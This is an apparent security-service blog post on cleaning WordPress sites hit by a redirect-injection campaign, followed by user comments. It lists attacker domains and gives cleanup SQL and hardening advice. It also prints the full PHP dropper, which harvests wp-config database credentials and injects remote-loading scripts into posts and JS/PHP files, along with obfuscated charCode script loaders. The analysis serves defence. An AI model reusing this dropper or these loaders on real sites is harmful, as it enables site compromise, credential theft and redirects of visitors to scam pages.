New Virus from the domain mono.declarebusinessgroup.ga, solo.declarebusinessgroup.ga , declarebusinessgroup.ga, trendopportunityfollow.ga , sinistermousemove.art & lowerbeforwarden.ml are infecting many WordPress sites

This is an adware/malware type of virus and they insert redirecting javascript to every posts & Page when visitors visit your site they redirect them to scam sites via javascript this type of attack is called Javascript Injects

If You are looking For Some One Professional who can Help to remove viruses permanently from your website check out my gig on fiverr


We are a cyber Security agency and Recently, we have got a bunch of requests to fix hacked WordPress Websites. We have listed some of the common virus-like solo.declarebusinessgroup.ga & lowerbeforwarden below. Have a look at them and get in touch with us immediately. if you want us to fix your virus and malware.


Some Common Malwares like lowerbeforwarden.ml

  1. js.donatelloflowfirstly.ga
  2. js.donatelloflowfirstly.ga/statistics.js?n=ns1
  3. scripts.lowerbeforwarden.ml
  4. scripts.lowerbeforwarden.ml/src.js?n=ns1
  5. source.lowerbeforwarden.ml
  6. directednotconverted.ml
  7. temp.lowerbeforwarden.ml/det.php
  8. rms_unique_wp_mu_pl_fl_nm.php
  9. location.lowerbeforwarden.ml
  10. go.donatelloflowfirstly.ga
  11. 0.directednotconverted.ml
  12. trendopportunityfollow.ga
  13. solo.declarebusinessgroup.ga
  14. sinistermousemove.art
  15. mono.declarebusinessgroup.ga
  16. declarebusinessgroup.ga
  17. bono.declarebusinessgroup.ga
  18. http://mono.declarebusinessgroup.ga/m.js

We have fixed almost all the websites and writing this article to give you an insight on how can you get your website back if your website is infected by this malware or any other malware.


How to Check for declarebusinessgroup.ga & sinistermousemove.art virus

if your site redirects visitors to some ugly looking webpages this virus may exist in your site

check your publich_html directory Or Home Directory of your site maybe you will find a file called: _a it’s a malware injection code that injects

<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>
<script src='https://sinistermousemove.art/src.js?n=ns1' type='text/javascript'></script>
<script src='https://solo.declarebusinessgroup.ga/temp.js?n=ns1' type='text/javascript'></script>
<script type='text/javascript' src='https://mono.declarebusinessgroup.ga/m.js?n=nb5'></script>
<script type='text/javascript' src='https://bono.declarebusinessgroup.ga/m.js?n=nb5'></script>

as you can see, the code reveal DB login info and inject the script code to any index.php file , and theme function too.


How to clean declarebusinessgroup.ga & sinistermousemoveVirus wordpress site

1. Remove malware inserting script files

Create a backup of your whole site including Database before changing any code

first, Delete _a , _f , _2 , lte_ etc ……. file from your site’s home (public_html) directory

2. Remove Unwanted PHP Files from mu-plugin directory

Delete if you spot any malicious code in Mu-Plugins Folder under WP-Contents — For example, you can see rms_unique_wp_mu_pl_fl_nm.php virus file in the image provided below.


3. Clean bono.declarebusinessgroup.ga & sinistermousemove.art redirecting Scripts from database

  1. Now you should clean the database
  2. Go to PhpMyAdmin. Choose the right database and run the following SQL query to remove scripts from WP_Posts tables. Make sure to change the script accordingly the identified one in your case.
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://mono.declarebusinessgroup.ga/temp.js?n=ns1' type='text/javascript'></script>", ""));

You may need to modify the script according to virus domain and your My SQL configuration

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src='https://bono.declarebusinessgroup.ga/m.js?n=nb5'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://sinistermousemove.art/src.js?n=ns1' type='text/javascript'></script>", ""));
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ""));

This method will also work for similar viruses you just need to change the domain name accordingly

  • *.donatelloflowfirstly.ga
  • js.donatelloflowfirstly.ga
  • go.donatelloflowfirstly.ga
  • lowerbeforwarden.ml
  • source.lowerbeforwarden.ml
  • scripts.lowerbeforwarden.ml
  • location.lowerbeforwarden.ml
  • temp.lowerbeforwarden.ml
  • Source.lowerbeforwarden.ml
  • 0.directednotconverted.ml
  • trendopportunityfollow.ga
  • solo.declarebusinessgroup.ga
  • sinistermousemove.art
  • mono.declarebusinessgroup.ga

you can email me for any issues & errors [email protected]


4. check and replace original URLs in WP_Options table

Remove sinistermousemove.art & mono.declarebusinessgroup.ga spam URLs from WP_Options table

Check your site URL and home URL in  in wp_options table in Database and make sure to change the right one. This is the prime reason when you open your website it will redirect you to multiple sites which may ask you to confirm your identity again and again.

Now clean Your website cache and check from a new browser or incognito virus should be gone


5. clean all index.php files

 Check all of the index.php files and verify it is not containing any such malware scripts like sinistermousemove.art

6. Replace WordPress core files

The best method to replace WordPress Core files is going to Admin dashboard -> Update and click on re-install WordPress

if you are not able to login in to wordpress admin dashboard then method described below will work fine

Manually Replace/overwrite all your WordPress core files excluding the WP-Content folder.

This can be done following these simple steps –

  1. Download latest WordPress Version From Here – Download Now
  2. Unzip it and delete Wp-Content from the extracted folder
  3. Make it a zip again
  4. Upload it to the root directory of your website
  5. Once uploaded, then extract the files
  6. Navigate to the folder where you have extracted the core files, the folder name should be the same as a zip file name you installed.
  7. Select all and move it to the root folder. If it asks to overwrite then it will be a yes.
  8. Done. Your WordPress core files are free from any virus and malware now and it is cleaned

7. replace themes and plugins if needed

Delete the currently active theme folder from the WP-Content/Themes folder and upload a fresh one. Once the active theme is deleted. Upload the theme zip file again in the same directory and extract it. One done delete the zip file.

If you have a child theme activated then make sure to upload and extract them as well.

also, delete all unused themes from WP-Content/Themes folder


If you need Professional’s help to clean viruses and malware from your site with a guarantee of not coming back

1. you can place an order on Fiverr

2. you can place direct order by sending 50$ on Paypal and we will contact you: link
(mention your email in the description)

3. For India: link

(We Remove virus/malware using very advanced tools and the virus will never come back again)

Thank you


Be safe Tighten Security of your WordPress site

 Disallow file editing

If a user has admin access to your WordPress dashboard they can edit any files that are part of your WordPress installation. This includes all plugins and themes.

If you disallow file editing, no one will be able to modify any of the files – even if a hacker obtains admin access to your WordPress dashboard.

To make this work, add the following to the wp-config.php file (at the very end):

define('DISALLOW_FILE_EDIT', true);

Only install trusted WordPress plugins and themes

Remove Unused Plugins and Themes

Install a WordPress security plugin

Installing a WordPress security plugin is a no-brainer when it comes to enhancing the security of your site. To become more proactive against security threats, try installing a plugin like one of these to minimize any security vulnerabilities.

Sucuri Security

 Secure the wp-config file

The wp-config file contains your website’s base configuration details, like database connection information. To protect your wp-config.php file from intrusion, add the following code to your .htaccess file to deny access to anyone surfing it:

<files wp-config.php>
order allow,deny
deny from all
</files>

Use More Secure Hosting

If you are using shared hosting your site, may get hacked because of another that contains a backdoor on the server so it better to use VPS

I recommend using dedicated VPS from Digital Ocean or AWS you can get that as low as 5$ per month

Periodic Review File changes

you can use security plugins to keep track of file changes

Change Passwords of your Database & Update same on wpconfig.php file

Clean other Core Files

There are many ways to clean your wordpress files. Here is my way:

1): Zip all the site files and download the zip file to desktop.

2): Unzip the files to the folder, “txnkaro” as an example.

3): Located to the folder  wp-content / plugins , and delete all plugins. Then replace with the clean plugins into the folder. Same with themes files, delete all themes and replace with clean themes.

4): Now run the VSCode editor, you can download it at: https://code.visualstudio.com/ and install it.

5): Open the  txnkaro (example) folder via VSCode, then click  Edit > Search in the files  to search the keywords:  donatelloflowfirstly . There should be only a few files been found since we have deleted all Cached Files and replaced all Themes and Plugins. Edit those files if you know how to or just replace them with clean files.

6): All files should be clean now. Delete your whole site, and upload this clean backup to the site folder. Your site should be OK.

There is another way to clean the file if you can login to site admin panel. Install  Wordfence  plugin and scan the whole stie. The Wordfence will find out those injected files, just edit them or replace them with clean files.

Now clean Your website cache files and your your browser cache and check virus should gon


New encrypted Versions of declarebusinessgroup.ga & lowerbeforwarden.ml Virus

Recently hackers started inserting encrypted version of this malicious code

<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,111,108,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>

Decoded Version of this malicious script is here

	<script type=text/javascript> Element.prototype.appendAfter = function(element) {
	element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
	(function() {
	 var elem = document.createElement(script);
	 elem.type = text/javascript elem.src = https://js.donatelloflowfirstly.ga/stats.jselem.appendAfter(document.getElementsByTagName(script)[0]);
	elem.appendAfter(document.getElementsByTagName(head)[0]);
	document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
</script></head>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {
	element.parentNode.insertBefore(this, element.nextSibling);
}
, false;
	(function() {
	 var elem = document.createElement(script);
	 elem.type = text/javascript elem.src = https://solo.declarebusinessgroup.ga/temp.jselem.appendAfter(document.getElementsByTagName(script)[0]);
	elem.appendAfter(document.getElementsByTagName(head)[0]);
	document.getElementsByTagName(head)[0].appendChild(elem);
}
)();
</script>


Back Door: Why this type of attack happens?

Most probably Nulled Plugins & Themes Cause this type of Malware Injections so remove all themes and plugin you have downloaded from unauthorized sources

other reasons

  • Not updating your themes and plugins for a long time
  • You may have missed the major WordPress Core releases
  • You might be using any nulled or cracked theme or plugin on your website
  • You may not have disabled xmlrpc.php for public users


Here’s the content of the _a malware file :

<?php echo "ssqqss>>>";
error_reporting(E_ALL);
ini_set('display_errors',1);


search_file_ms($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","wp-config.php");
die();


function get_var_reg($pat,$text) {

if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}

return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_ms( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){


$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {

show_sitenames($path);



}

} else if($value != "." && $value != "..") {

@search_file_ms($path, $file_to_search);

}
}
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {


$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {

} else {


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "js.donatelloflowfirstly.ga") === false){
if(strpos($val, "js.donatelloflowfirstly.ga") === false){


$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];

} else {

}

}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it($path);

} }else if($value != "." && $value != "..") {

search_file($path, $file_to_search);

}
}

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

search_file_index( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

make_it_index($path);

} }else if($value != "." && $value != "..") {

search_file_index($path, $file_to_search);

}
}

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {

$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {

@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {

@search_file_js( $dir,$file_to_search);
return;
}
}

foreach($files as $key => $value){

$path = realpath($dir.DIRECTORY_SEPARATOR.$value);

if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

make_it_js($path);

} }else if($value != "." && $value != "..") {

search_file_js($path, $file_to_search);

}
}

}

function make_it_js($f){
$g = file_get_contents($f);



if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "js:".$f."\r\n";
}


}
function make_it_index($f){

if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false || strpos($g, 'js.donatelloflowfirstly.ga') !== false) {

} else {
$l2 = "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."\r\n";


}
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createEle ment(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\r\n";
}


}
}

If you need Professional’s help to clean & remove Viruses and restore your site back to normal you can email me : [email protected]

44 Comments

  • Trish says:

    _2 File is deleted still code showing and website is redirecting on weird spamming web.

  • Waikey says:

    Same problem happened to my blog! here is my step:
    1: Read the -a file and found out this file search the whole JS file, index file then inject the code to those files!
    2: Install wordfence and scan the whole file, found out almost all themes and plugins JS / index file been injected
    3: Deleted all plugins and themes (not de-active, just delete), then upload the clean file
    4: Scan again, and edit some missed file.
    5: Login to phpmyadmin and run the sql command to remove the code injected into the content.
    6: Checked all plugins and de-actived 2 of them. It’s shame since I used the nulled plugins.
    May I ask what plugins your friends used ?

  • Yadley says:

    After endlessly digging online for a practical solution to this attack, this post seems to be the only one coming to the rescue. Thank you very much for this piece of information. Just one small issue though, here`s what we`re getting when we try to clean the DB per your specification:
    Static analysis:
    1 errors were found during analysis.
    Variable name was expected. (near “?” at position 115)
    SQL query:
    UPDATE wp_posts SET post_content = (REPLACE (post_content, “”, ‘’))
    MySQL said: Documentation
    #1064 – You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1′ type=’text/javas…’ at line 1
    Any insights?

  • Krishna says:

    I installed Wordfence security plugin after my website using Hestia got redirected URLs to spam websites. After scanning my website with the plugin it detected that header.php is malicious file with backdoor activity. Can anybody verify if it’s false positive or something I should worry about?
    Filename: wp-content/themes/hestia/header.php
    File Type: Not a core, theme, or plugin file from wordpress.org.
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:

  • Krishna says:

    Last time this link occurred on my website was on 14th August(Friday)…
    After that, I have cleaned my database ( especially posts and option table data )
    Deleted all the plugins & themes and re-installed them…
    and also have Re-installed the WordPress version…
    Deleted all the suspicious files from public_html and refined everything…
    And my website was working fine… until yesterday(Friday), it(malicious URL) popped again.
    But, now I can say there could be one of the two scenarios: –
    1. This link will occur next Friday again ( as one of you mentioned that it re-appears every Friday ) which proved right in my case also.
    2. Yesterday, I have enabled my cache( which I had disabled on 15th Aug after refining my site ).
    Having said that, this morning, I have searched my database & public_html and there is no trace of this malicious URL but in my main theme – this URL was there in the header script.
    So,
    Firstly, I think it happened because I haven’t deleted my cache after refining my website on 14th August. ( and when I enabled cache, this brought that URL back )
    Secondly, if this URL keeps coming back every Friday then why we don’t have any other _a(suspicious) file coming along with it. Which again arises two scenarios: –
    1. Either we have not been able to remove it completely from our public_html
    2. Or, this URL needs a trigger ( a script or file that helps it in re-appearing on our site )
    To conclude,
    I think it was because of cache indulgence otherwise, this link should have been all over the website again ( which was not the case this time as it only appeared in the header script of my theme ).
    Also, I will wait until next Friday and see if it reappears or not.
    Things you must do immediately after refining your website:-
    1. Change your host password, WordPress password, and cPanel password every 15 days. (the major reason is that this Virus was into your public_html and also most probably have accessed your wf-config file which contains such data ).
    If anyone finds the root/backdoor of this virus, please mention.

  • Yadley says:

    Okay, I have discovered that this virus regenerates itself every Friday. This time it was a little more hardcoded and was hidden in my theme`s . Looks like this thing will always pop back every Friday and I`m wondering if there’s anything we can do every Thursday, perhaps, to stop the regeneration.

    • Uday kushwaha says:

      which files of you theme got infected?

      • MogaArt says:

        En nuestro caso el primer ataque fue el 11 de Agosto (Centro- América) Hemos restaurado copias de seguridad “limpias” y vuelve el ataque, todos los días!!!!!!. – Primero editando desde phpMyAdmin en la base de datos el fichero ‘wp-options’ las URL, después de un nuevo ataque apareció el archivo a_. Dimos de baja la cuenta desde el servidor y cargar un resplado aún más viejo y reapareció el virus. Hemos tratado cambiando las versiones del tema, también del WordPress. Justo ayer (22 de Agosto) hemos encontrado la carpeta mu_plugin en wp-content y ya estamos hartos también.
        1.- ¿Pueda ser que tengamos un plugin en común?
        2.- ¿Pueda ser que los creadores de este malware tengan registrados ya nuestros dominios, pues hemos encontrado información que una vez que estás en su base de datos, ya no te soltarán jamás aunque subas la web desde 0…
        El usuario @AHMED ZEIDAN ha comentado que lo ha solucionado de raíz… pero esperaremos a que nos confirme pasados los días si efectivamente su sitio sigue limpio y libre.

  • digitalsoon says:

    Interested to know where the backdoor is, even though I can fix it but it comes back…

  • Juan says:

    Buenas tardes estimados:
    UPDATE wp_posts SET post_content = (REPLACE (post_content, “ ”,’ ‘ ));
    Al intentar colocar el codigo para la consulta de SQL da el siguiente error:
    #1064 – Algo está equivocado en su sintax cerca ‘src = ‘https: //js.donatelloflowfirstly.ga/stat.js? N= ns1 ′ type =’ text / ja’ en la linea 1
    Alguien tendrá la consulta SQL correcta que la pueda compartir?
    Saludos cordiales a todos

  • Uday kushwaha says:

    Ohk let me tell you my story so i was first attacked on 5 aug 2020 i think, it was a simple attack that’s what i was thinking that time so someone did changed my website url in the database so the website was redirected to another url, I know little bit about phpmyadmin so i logged in to my database using cpanel and change my site URL in wp_options table and everything goes back to normal. I was relieved and kind of feeling like i fooled the hacker who just changed url of my websites somehow, but apparently after 10 days my website got hacked again this time not my old website all of my hosting server websites got hacked and got that weird line of code on each website top header and continue firewall alert of my antivirus about suspecious url, i was in shock and when i checked cpanel files all my website inedex.php file and .js file got update with that javascript code in them and all permission to these files changed to 777 which freak me out, i tried contacting my hosting provider (that is a2 hosting ) thay mentioned your website is detected with malware and these are some references link that you can use to clean your website yourself , trust me i don’t even understand a single line written on those posts, rather i tried searching for the “donateall…..” url on Google and it looks like so many websites are still the victim of this malware, luckily i found some information regarding this malware removal so i tried that , first i restore the backdate working backup of my websites ( luckily a2hosting provide few days past backup saved ) then i tried accessing website, so now the website are back but still got that url link in my console windows with 404 error so i tried cleaning those script with that url after logging in to wordpress dashboard and with the help of plugin better search replace i clean all my database tables, and I installed and update wordfence and do a complete scan for all my websites along with it i updated my wordpress version to the latest with updating all the plugin then i was feeling relived and more secured after that hactic work.
    But story doesn’t ends here it looks like all my website again got hacked with the same malware ,😭 despite of removing each and every piece of suspected code i got hacked again, i know i can do the above mentioned solutions again but how are they getting access to my server and do install that script of code in my wordpress files.
    For your information:
    Yes there was _a file in my main directory
    Yes there was mu-plugin folder in wp-content which consists of a rms_unique_wp_mu_pl_fl_nm.php file having some “Remote access” code in it.
    I just wanted to know how to remove this malware completely from my websites to avoid getting hacked again in future. Please please help me out 😭😭😭

  • Ahmed Zeidan says:

    I contacted Hitesh and he did a good job fixing the problem from it’s roots. Highly recommended to hire him for this tough malware cleanup.
    Thanks Hitesh.

  • Tropixel says:

    Hi guys, I’ve also had a website of mine hacked twice. I thought I’d cleaned it sufficiently using the above and other recommendations but it came back today again. It seems to happen on a Friday or Monday.
    In my case I even upgraded to Cloudflare pro etc but it still didn’t work which makes me think that I hadn’t cleaned the site properly in the first place.
    Thanks to this thread I found a mu-plugin folder too with that same file in it.
    Hopefully this was the file that caused the issues.

  • Oleg says:

    Hi guys!
    If you are interesting – I can help with cleanup from that virus.
    The problem is not only in database and few php codes, this is complex trouble. Since virus infected most JS files too, including engine, plugins and theme. (I count about 1000+ entries in my directories). Plus some backdoors open from verified plugins! (especially if you using Elementor).
    Right, mu-plugin, fixed-header elementor plugin + some more in engine. Antivirus don’t detecting that yet!
    So if you feel that have a success, all clean and restarted. Highly likely you can have 2nd wave of attack.
    cheers,
    Oleg

  • Bashiachuki says:

    I have this virus and its only redirecting to spam links from /shop/ or woocommerce other pages and products
    I can’t find this virus anywhere
    I can’t do SQL command as I am getting this error: Error in query (1064): Syntax error near ‘src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1′ type=’text/javascri’ at line 1
    Can anybody help me out?

  • minoir says:

    Parece que esta es la versión más actualizada de como limpiar el donatello.
    Btw, estuve en una situación donde limpiaba archivos, temas, borraba “_a” limpiaba la base de datos, y revisaba en mi wp_options los links de mi sitio web, sin éxito.
    La solución la encontré con el update que mencionan aquí mismo, busque la siguiente linea “Element.prototype.appendAfter” entre mis archivos descargados y efectivamente encontré que existían variaciones en todas las cabeceras de los archivos js de mi sitio web. La eliminé de todos ellos y estoy viendo su comportamiento
    – – –
    Google translate:
    It seems this is the most up-to-date version of how to clean the donatello.
    By the way, I was in a situation where I cleaned files, themes, deleted “_a”, cleaned the database, and checked my website links in my wp_options, without success.
    The solution I found with the update they mention right here, look for the following line “Element.prototype.appendAfter” among my downloaded files and indeed I found that there were variations in all the headers of the js files of my website. I removed her from all of them and I’m watching her behavior

  • Login says:

    Получите Ваши данные

    Подробнее по ссылке

  • Login says:

    Начисление бонуса по одному из ваших счетов.

    Подробнее по ссылке

  • Daniel says:

    You are really awesome man. Thank for taking immediate action to fix my WordPress hack and that to by offering a very reasonable charge.

    I have shared this to many friends who is having this WordPress redirect issue.

  • san mehta says:

    Thank you for fixing lowerbeforwarden.ml malware from my website. I was not even able to open the WP Dashboard. Now it is perfectly fine.

    It’s been three days now and I have not experienced the problem again. Appreciated man!

  • online live sports says:

    Thankfulness to my father who informed me on the topic of this blog, this blog is
    actually amazing.

  • Ratnesh sharma says:

    nice blog

Leave a Reply